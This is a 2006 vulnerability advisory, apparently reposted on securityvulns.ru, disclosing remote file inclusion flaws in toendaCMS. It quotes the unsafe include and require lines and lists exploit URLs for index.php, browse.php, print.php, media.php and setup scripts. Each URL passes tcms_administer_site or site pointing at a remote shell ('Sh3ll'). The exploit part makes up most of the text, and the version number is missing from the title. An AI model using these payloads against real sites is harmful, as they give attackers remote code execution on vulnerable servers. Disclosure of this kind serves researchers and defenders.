Security Advisory: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Vulnerability: ModernBill Insecure CURL Settings
  Уязвимости в CMS WebDirector
  phpECard (functions.
php) Remote File Inclusion Exploit
  ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit

From: h4ck3riran_(at)_yahoo.com <h4ck3riran_(at)_yahoo.com>
Date: 30.08.2006
Subject: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )

*******************************************************************************
***

***
***

***
***

***
***                                           PerSiaNFoX DigitaL SecuritY TeaM
***

***

***
***

***
***

***
*******************************************************************************

<# ToendaCMS<= ( Remote File Include Vulnerabilities

<# Script.............. : toendaCMS
<# Discovered By.... : Root3r_H3ll
<# Location .......... : Iran
<# Class.............. : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

---------------------------------------------------------------------------------
----------------------------

< # CodE : include($tcms_administer_site.'/tcms_global/database.php')

< #Expolit :
< #http://Www.Site.coM/[path]/index.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/browse.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/print.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/setup/inc/database.php?tcms_administer_site=Sh3ll

< # CodE :   require($tcms_administer_site.'/tcms_global/database.php')

< #Expolit :
< #http://Www.Site.coM/[path]/media.php?tcms_administer_site=Sh3ll

< #CodE: include($site.'.php');

< # Expolit :
< # http://Www.Site.coM/[path]/setup/index.php?site=Sh3ll